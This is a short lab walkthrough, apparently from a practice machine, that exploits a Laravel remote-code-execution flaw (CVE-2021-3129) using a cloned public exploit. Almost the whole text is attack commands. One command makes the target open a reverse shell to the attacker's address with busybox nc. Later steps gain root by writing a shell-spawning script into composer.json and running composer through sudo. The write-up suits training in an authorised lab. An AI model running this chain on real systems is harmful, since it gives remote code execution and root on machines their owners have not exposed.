80

Using this exploit:

git clone https://github.com/joshuavanderpoll/CVE-2021-3129.git
cd CVE-2021-3129
python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt

Checking the chains available:

python3 CVE-2021-3129.py --chains
python3 CVE-2021-3129.py --host http://192.168.155.38/ --exec 'busybox nc 192.168.45.223 80 -e bash' --chain Laravel/RCE2

Now run a listener:

pen 80

Start a listener:

penelope.py 8000

We can run composer without password.

Now in /var/www/html/lavita edit composer.json WITH SHELL AS WWW-DATA:

echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' > composer.json
sudo /usr/bin/composer --working-dir\=/var/www/html/lavita run-script x

Last updated